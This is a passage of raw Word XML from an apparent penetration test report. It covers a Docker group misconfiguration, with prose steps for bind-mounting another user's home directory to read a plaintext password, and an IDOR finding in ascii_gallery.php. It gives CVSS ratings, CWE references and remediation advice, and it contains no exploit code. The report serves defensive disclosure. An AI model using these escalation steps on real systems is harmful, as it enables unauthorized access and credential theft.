                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, which contained sopot’s plaintext password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="68E715DD" w14:textId="77777777" w:rsidTr="004A1D00">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0474321" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="729BDA3D" w14:textId="77777777" w:rsidTr="004A1D00">
        <w:trPr>
          <w:trHeight w:val="288"/>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043EA711" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="6DD97F03"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01056A9"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="0939F8F9" w14:textId="77777777" w:rsidTr="004A1D00">
        <w:trPr>
          <w:trHeight w:val="270"/>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0E4EBE2" w14:textId="32B41306" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00564FA7" w:rsidP="00564FA7">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This exposure enables full compromise of user files, facilitates privilege escalation through Docker access, and creates opportunities for lateral movement using stolen credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="7C2A08D4"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01120F5"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="0669D96E"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9DCCB23" w14:textId="1263AC9A" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00787438" w:rsidP="00787438">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 xml:space="preserve">It is recommended to limit Docker access to trusted administrators, remove the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>stocznia</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> account from the docker group, and strengthen permissions on sensitive files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="60E4F8A2"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5C71107" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00C420B0">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B71A69" w:rsidRPr="00D77DFE" w14:paraId="33DCBCC5"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7EB95C0" w14:textId="16077A8F" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="0017505D" w:rsidP="0017505D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="1287"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authenticate as stocznia, start a Docker container with a bind mount to sopot’s home directory, copy the mounted contents, extract the plaintext credentials from my_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>backup.save</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, and use them to successfully log in as sopot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="33F92602"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36429920" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="4F6BD092" w14:textId="77777777" w:rsidTr="004A1D00">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D5F6327" w14:textId="1D5852E2" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="009E4D57">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI161" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>, Figure A.</w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>16.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> , </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI162" w:history="1">
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.16.2</w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve"> Docker Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w14:paraId="40DDFF96" w14:textId="77777777" w:rsidTr="004A1D00">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62D3F30" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69"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B71A69" w:rsidRPr="00D77DFE" w14:paraId="767D5E4E" w14:textId="77777777" w:rsidTr="004A1D00">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8875A1B" w14:textId="369030C9" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId52" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/269.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00431D09" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink r:id="rId53" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/732.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0B988D9C" w14:textId="77777777" w:rsidR="00B71A69" w:rsidRPr="00D77DFE" w:rsidRDefault="00B71A69" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/829.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EC7A9EB" w14:textId="77777777" w:rsidR="004A1D00" w:rsidRPr="00D77DFE" w:rsidRDefault="004A1D00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439"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4719"/>
        <w:gridCol w:w="4720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="5C063D2E" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="296"/>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C2D2C38" w14:textId="5E9F0DA1" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00C02F3D" w:rsidP="004A1D00">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0E2841" w:themeColor="text2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>IDOR in ascii_gallery.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="52452F44" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="296"/>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1A5D0F4" w14:textId="5D9DEBC7"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 xml:space="preserve">Reference No: </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714DD730" w14:textId="2B8034C2"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Risk Rating:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="2C6A9EB5" w14:textId="77777777" w:rsidTr="007B6EB7">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7665E992" w14:textId="42005E13" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE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VUL_</w:t>
            </w:r>
            <w:r w:rsidR="007956D4" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>17</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EBE7A67" w14:textId="33116EE0"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Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51C3E7B1" wp14:editId="374C08C9">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1021095</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>34925</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="2011615187"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97660" cy="127635"/>
                              </a:xfrm>
                              <a:prstGeom prst="roundRect">
                                <a:avLst>
                                  <a:gd name="adj" fmla="val 16667"/>
                                </a:avLst>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:srgbClr val="FFFF00"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:srgbClr val="FFFF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CC8C979" id="Rectangle: Rounded Corners 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:80.4pt;margin-top:2.75pt;width:125.8pt;height:10.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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00B25473" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="24AA3D38" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="340"/>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1573EB4" w14:textId="5F5A8942"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CVSS:</w:t>
            </w:r>
            <w:r w:rsidR="00B25473" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4.3</w:t>
            </w:r>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B0D34AA" w14:textId="77777777" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="7F6658CB" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="474"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4719"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31FB508E" w14:textId="30F8555C" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00B25473"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CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AV:N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PR:N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UI:R</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S:U</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C:L</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I:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4720" w:type="dxa"/>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14E2ECE" w14:textId="4B04B4A6" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-639: Authorization Bypass Through User-Controlled Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="28B963C9" w14:textId="77777777" w:rsidTr="00836DE6">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14695A49" w14:textId="77777777"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Tools Used:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="0AB370F9" w14:textId="77777777" w:rsidTr="007B6EB7">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6B35D183" w14:textId="77777777" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE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Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="5C3AC8A5" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="253"/>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101C6F7" w14:textId="77777777" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE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 xml:space="preserve">Vulnerability Description: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="177D0AC6" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="205"/>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563056C1" w14:textId="11DF34C9" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="0030328A">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 xml:space="preserve">Insecure Direct Object Reference (IDOR) </w:t>
            </w:r>
            <w:r w:rsidR="0030328A" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>occurs when attackers manipulate object identifiers in URLs or parameters to access data without proper access control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="36A96305" w14:textId="77777777" w:rsidTr="00836DE6">
        <w:trPr>
          <w:trHeight w:val="264"/>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4B347640" w14:textId="77777777" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable URLs / IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="4A7AA7D9" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="288"/>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B4894A1" w14:textId="2FB3F135" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="008C7499" w:rsidP="00C420B0">
            <w:pPr>
              <w:pStyle w:val="TableSmHeadingRight"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.0.3.190</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="58DFE9A0" w14:textId="77777777" w:rsidTr="00836DE6">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E8614FC" w14:textId="77777777"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Implications / Consequences of not Fixing the Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="7E5F115D" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:trPr>
          <w:trHeight w:val="270"/>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1C6B01D" w14:textId="46BF0E70" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00787438" w:rsidP="00787438">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unauthorized access to administrative content leads to sensitive information leakage and enables large-scale automated harvesting through predictable identifiers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="08178526" w14:textId="77777777" w:rsidTr="00836DE6">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202A0BE8" w14:textId="77777777"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Suggested Countermeasures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="00447A8F"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20F55ED9" w14:textId="7DF99C37" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00787438" w:rsidP="00787438">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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It is recommended to immediately secure the affected resources by enforcing authentication, removing exposed admin content, and implementing server-side RBAC authorization for all object retrieval endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w14:paraId="7E2E7843" w14:textId="77777777" w:rsidTr="00836DE6">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98FD6C0" w14:textId="52867281" w:rsidR="00836DE6" w:rsidRPr="00D77DFE" w:rsidRDefault="00836DE6" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to Reproduce: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
